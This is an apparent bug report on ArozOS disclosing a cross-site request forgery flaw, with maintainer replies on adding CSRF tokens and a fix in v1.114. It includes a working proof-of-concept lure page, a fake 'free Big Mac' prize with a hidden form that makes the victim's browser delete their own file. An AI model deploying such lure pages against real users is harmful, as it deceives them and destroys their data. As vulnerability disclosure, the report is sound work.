[BUG] Cross Site Request Forgery (CSRF) Attack

[YamiOdymel]

Describe the bug A button from the other website is able to redirects the user and deletes he's own file while he didn't notice.

To Reproduce

1. Create a fake website, webpage.
2. Fool the user with a custom form that calls the file_system/fileOpr API to the ArozOS.
3. Anyone who clicked the button deletes he's own my_very_important_file.txt without any notice.

<!DOCTYPE html>
<html lang="en">
    <head>
        <meta charset="UTF-8" />
        <title>You won the prize!</title>
    </head>
    <body>
        <h1>OMG! You've won a free Big Mac!</h1>
        <p>To get a reedem code, press the button below!</p>
        <form action="http://localhost:8080/system/file_system/fileOpr" method="POST">
            <input type="hidden" name="opr" value="recycle" />
            <input type="hidden" name="src" value='["user:/my_very_important_file.txt"]' />
            <input type="submit" value="Get my reedem code!" />
        </form>
    </body>
</html>

Expected behavior ArozOS should've treated this as an illegal request with CORS or CSRF Token solution.

Screenshots

Host Information(please complete the following information):

• OS: Ubuntu 20.04.2 LTS
• Go version: (if you build it yourself) Downloaded from the release page
• Arozos version: 1.113

Client Information(please complete the following information):

• OS: Windows 10
• Browser: Chrome 90
• Version: 90.0.4430.212 [64-bit]

[blackphreak]

@tobychui A CSRF token system could be implemented to solve this problem.

[tobychui]

@tobychui A CSRF token system could be implemented to solve this problem.

Ok cool 👍🏻 I am thinking if there are any implementation that we can work on all the ArozOS endpoint at once without changing the whole infrastructure. Server side can be handled using the prouter module (Permission HTTP router). But I didn't have any idea regarding client side code implementation for the CSRF token system. Any clues?

[tobychui]

CSRF Token generation and validation mechanism has been implemented in internal nightly version of ArozOS and scheduled to be release with the v1.114 release.